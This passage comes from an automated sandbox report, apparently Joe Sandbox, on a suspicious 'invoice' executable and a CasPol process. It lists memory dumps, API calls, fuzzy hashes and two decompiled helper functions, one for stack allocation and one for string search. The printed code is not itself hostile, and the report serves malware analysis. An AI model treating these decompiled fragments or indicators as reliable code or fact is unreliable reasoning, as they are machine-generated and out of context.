                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3370423016
                                            • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                            • Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
                                            • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                            • Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                            				char* _t17;
                                            				char _t19;
                                            				void* _t20;
                                            				void* _t24;
                                            				void* _t27;
                                            				void* _t31;
                                            				void* _t37;
                                            				void* _t39;
                                            				void* _t40;
                                            				signed int _t43;
                                            				void* _t52;
                                            				char* _t53;
                                            				char* _t55;
                                            				void* _t56;
                                            				void* _t58;
                                            
                                            				 *0x1000405c = _a8;
                                            				 *0x10004060 = _a16;
                                            				 *0x10004064 = _a12;
                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
                                            				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
                                            				_t17 = E1000123B();
                                            				_a8 = _t17;
                                            				_t53 = _t17;
                                            				if( *_t17 == 0) {
                                            					L16:
                                            					return GlobalFree(_a8);
                                            				} else {
                                            					do {
                                            						_t19 =  *_t53;
                                            						_t55 = _t53 + 1;
                                            						_t58 = _t19 - 0x6c;
                                            						if(_t58 > 0) {
                                            							_t20 = _t19 - 0x70;
                                            							if(_t20 == 0) {
                                            								L12:
                                            								_t53 = _t55 + 1;
                                            								_t24 = E10001266(E100012AD( *_t55 - 0x30));
                                            								L13:
                                            								GlobalFree(_t24);
                                            								goto L14;
                                            							}
                                            							_t27 = _t20;
                                            							if(_t27 == 0) {
                                            								L10:
                                            								_t53 = _t55 + 1;
                                            								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
                                            								goto L13;
                                            							}
                                            							L7:
                                            							if(_t27 == 1) {
                                            								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                            								 *_t31 =  *0x10004030;
                                            								 *0x10004030 = _t31;
                                            								E10001508(_t31 + 4,  *0x10004064, _t43);
                                            								_t56 = _t56 + 0xc;
                                            							}
                                            							goto L14;
                                            						}
                                            						if(_t58 == 0) {
                                            							L17:
                                            							_t34 =  *0x10004030;
                                            							if( *0x10004030 != 0) {
                                            								E10001508( *0x10004064, _t34 + 4, _t43);
                                            								_t37 =  *0x10004030;
                                            								_t56 = _t56 + 0xc;
                                            								GlobalFree(_t37);
                                            								 *0x10004030 =  *_t37;
                                            							}
                                            							goto L14;
                                            						}
                                            						_t39 = _t19 - 0x4c;
                                            						if(_t39 == 0) {
                                            							goto L17;
                                            						}
                                            						_t40 = _t39 - 4;
                                            						if(_t40 == 0) {
                                            							 *_t55 =  *_t55 + 0xa;
                                            							goto L12;
                                            						}
                                            						_t27 = _t40;
                                            						if(_t27 == 0) {
                                            							 *_t55 =  *_t55 + 0xa;
                                            							goto L10;
                                            						}
                                            						goto L7;
                                            						L14:
                                            					} while ( *_t53 != 0);
                                            					goto L16;
                                            				}
                                            			}



















                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                            • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                            • GlobalFree.KERNEL32(?), ref: 100011C7
                                            • GlobalFree.KERNEL32(?), ref: 100011F5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                            • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                            • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                            • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405A63(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                            				int _v8;
                                            				int _t12;
                                            				int _t14;
                                            				int _t15;
                                            				CHAR* _t17;
                                            				CHAR* _t27;
                                            
                                            				_t12 = lstrlenA(_a8);
                                            				_t27 = _a4;
                                            				_v8 = _t12;
                                            				while(lstrlenA(_t27) >= _v8) {
                                            					_t14 = _v8;
                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                            					_t15 = lstrcmpiA(_t27, _a8);
                                            					_t27[_v8] =  *(_t14 + _t27);
                                            					if(_t15 == 0) {
                                            						_t17 = _t27;
                                            					} else {
                                            						_t27 = CharNextA(_t27);
                                            						continue;
                                            					}
                                            					L5:
                                            					return _t17;
                                            				}
                                            				_t17 = 0;
                                            				goto L5;
                                            			}










                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A8B
                                            • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                            • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
                                            • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                            • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2122a53f9b6b72115b66811f7a4584317995e889af1383988683cbd66599c566
                                            • Instruction ID: 4745326d0e95f516736cbea73c9bfee16bd7f9cb0ce9f65ec1128a70ca55950b
                                            • Opcode Fuzzy Hash: 2122a53f9b6b72115b66811f7a4584317995e889af1383988683cbd66599c566